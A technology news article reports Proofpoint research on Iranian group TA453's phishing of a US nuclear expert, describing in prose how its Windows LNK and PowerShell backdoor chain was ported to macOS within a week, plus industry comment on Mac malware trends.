Iranian hackers targeted nuclear expert, ported Windows infection chain to Mac in a week

New research has shown the flexibility of threat actors to rapidly iterate attack patterns in order to bypass security controls.

An investigation from security firm Proofpoint into a recent attack targeting a nuclear security expert at a US-based think tank revealed how well-resourced attackers change tactics on the fly to compromise different machines.

After realizing their initial payload wouldn’t work on a Mac, they quickly pivoted to new techniques known to work on targets who used Apple hardware.

The sophisticated operation saw skilled threat actors devise a seemingly benign email chain with the high-profile target and continue the conversation over the course of weeks to build trust and rapport, exploiting that to launch further attacks.

How the attack unfolded

The mid-May 2023 attack came from TA453, an Iranian state-affiliated threat actor, also tracked under the monikers: Charming Kitten; APT42; Mint Sandstorm; and Yellow Garuda, and saw them posing as members of the Royal United Services Institute (RUSI).

Using a multi-persona approach, the attackers - known for conducting espionage operations - started an email chain with the target seemingly seeking feedback on a project titled ‘Iran in the Global Security Context’.

The attackers sent multiple messages from different accounts, all referencing each other to generate a feeling of authenticity - a technique seen before in email hijacking campaigns.

After a single seemingly benign interaction, a malicious Google Script macro was delivered, intended to direct the target to a Dropbox URL. The URL hosted a password-encrypted .rar file, which contained a dropper masquerading as a PDF but was actually a Windows LNK file.

Using LNK files has been a hallmark of cyber attacks since Microsoft blocked VBA macros by default last year. Exploiting VBA macros had for years been the go-to method for installing malware using maliciously crafted Microsoft 365 files.

Proofpoint said, “Using a .rar and LNK file to deploy malware differs from TA453’s typical infection chain of using VBA macros or remote template injection”.

“The LNK enclosed in the RAR used PowerShell to download additional stages from a cloud hosting provider.”

However, the target was using an Apple computer, meaning that the delivered file would not run. The file it attempted to deliver was a newly identified PowerShell-based backdoor called GorjolEcho.

Once it realized GorjolEcho would not execute on macOS, TA453 then pivoted to re-launch the attack at a later date using a ported version of the backdoor that worked on Apple hardware.

The attackers continued the same seemingly innocent email conversation with the target and roughly a week after the initial Windows-based attempt, they relaunched the attack with the Apple-ported backdoor.

In this case, the malware was delivered via a password-protected ZIP file masquerading as a RUSI VPN solution and shared drive. 

After some interactions with the threat actor, the user would be persuaded to open the file. A series of bash scripts would have then installed a backdoor, dubbed NokNok.

Proofpoint judged that this was intended to serve as a foothold for further instruction and was almost certainly a port of the PowerShell backdoor.

The incident serves as a reminder of the adaptability of the threat actors. In this instance, LNK files were sent instead of Microsoft Word documents with macros, and swiftly ported to macOS when the opportunity arose. 

The state of Mac malware

As Apple hardware has become progressively more popular in the enterprise, it has become correspondingly more of a target for threat actors.

That said, according to Apple management specialist Jamf, in 2022 there was a drop in new malware infections. 

In its 2023 State of Malware report, Malwarebytes noted that while Mac malware was rare, it did exist. 11% of machines with detection events were infected by malware.

However, Michael Covington, VP of portfolio strategy at Jamf, told ITPro that 2023 had been a very active period for Apple security.

He said: “In the first half of the year, we saw some noteworthy developments in the threat landscape indicating that attacks against Apple devices were changing, both in terms of intensity and purpose”. 

“During this time, we saw the first real instance of ransomware emerge that was built specifically to target macOS. We also saw new malware in distribution, attributed to state-sponsored attackers, that used novel evasion techniques to avoid detection and bypass built-in platform protections to take root.”

Covington also noted the rise of cryptojacking threats aimed at Apple processors and the continued evolution of spyware being used against high-risk individuals - primarily in government and media, but also commended Apple’s actions to address active exploits.

He also warned of the risk posed by gullible or distracted users, particularly with regard to phishing attacks.

Proofpoint’s research is evidence of the adaptability of threat actors, their ability to respond to changes in the environment, and the continually evolving threat landscape.

Joshua Miller of Proofpoint said: “TA453’s capability and willingness to devote resources into new tooling to compromise its targets exemplifies the persistence of state-aligned cyber threats”. 

“The threat actor’s continued efforts to iterate their infection chains to bypass security controls demonstrate how important a strong community-informed defense is to frustrate even the most advanced adversaries.”